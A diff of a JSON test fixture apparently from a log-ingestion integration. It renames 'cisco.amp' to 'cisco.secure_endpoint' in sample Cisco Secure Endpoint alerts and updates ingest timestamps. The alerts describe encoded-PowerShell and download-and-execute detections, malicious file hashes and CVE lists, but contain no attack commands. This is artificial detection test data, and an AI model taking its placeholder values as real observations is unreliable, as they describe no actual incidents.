                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1833,7 +1833,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783763725Z",
+                "ingested": "2021-09-27T00:40:55.631403351Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T05:49:06.000Z",
@@ -1844,7 +1844,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1913,7 +1913,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783765876Z",
+                "ingested": "2021-09-27T00:40:55.631405395Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
@@ -1924,7 +1924,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1994,7 +1994,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-13T18:06:29.783767954Z",
+                "ingested": "2021-09-27T00:40:55.631407320Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -2005,7 +2005,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2058,13 +2058,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:06:29.783770016Z",
+                "ingested": "2021-09-27T00:40:55.631409252Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583671182384431000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2120,7 +2120,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783772071Z",
+                "ingested": "2021-09-27T00:40:55.631411176Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -2130,7 +2130,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2195,7 +2195,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783774129Z",
+                "ingested": "2021-09-27T00:40:55.631413106Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -2205,7 +2205,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2272,7 +2272,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783776187Z",
+                "ingested": "2021-09-27T00:40:55.631415038Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2283,7 +2283,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.0B965CA8AF-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2355,7 +2355,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783778260Z",
+                "ingested": "2021-09-27T00:40:55.631416952Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2366,7 +2366,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.0B965CA8AF-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -2434,7 +2434,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:29.783780334Z",
+                "ingested": "2021-09-27T00:40:55.631418862Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:37:33.000Z",
@@ -2445,7 +2445,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2598,13 +2598,13 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-13T18:06:29.783782431Z",
+                "ingested": "2021-09-27T00:40:55.631420788Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6508159571352093000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2667,7 +2667,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783788750Z",
+                "ingested": "2021-09-27T00:40:55.631422694Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:13.000Z",
@@ -2678,7 +2678,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2753,7 +2753,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783790904Z",
+                "ingested": "2021-09-27T00:40:55.631424608Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:08.000Z",
@@ -2764,7 +2764,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2832,7 +2832,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783793103Z",
+                "ingested": "2021-09-27T00:40:55.631426664Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2842,7 +2842,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2910,7 +2910,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:06:29.783795204Z",
+                "ingested": "2021-09-27T00:40:55.631428668Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single 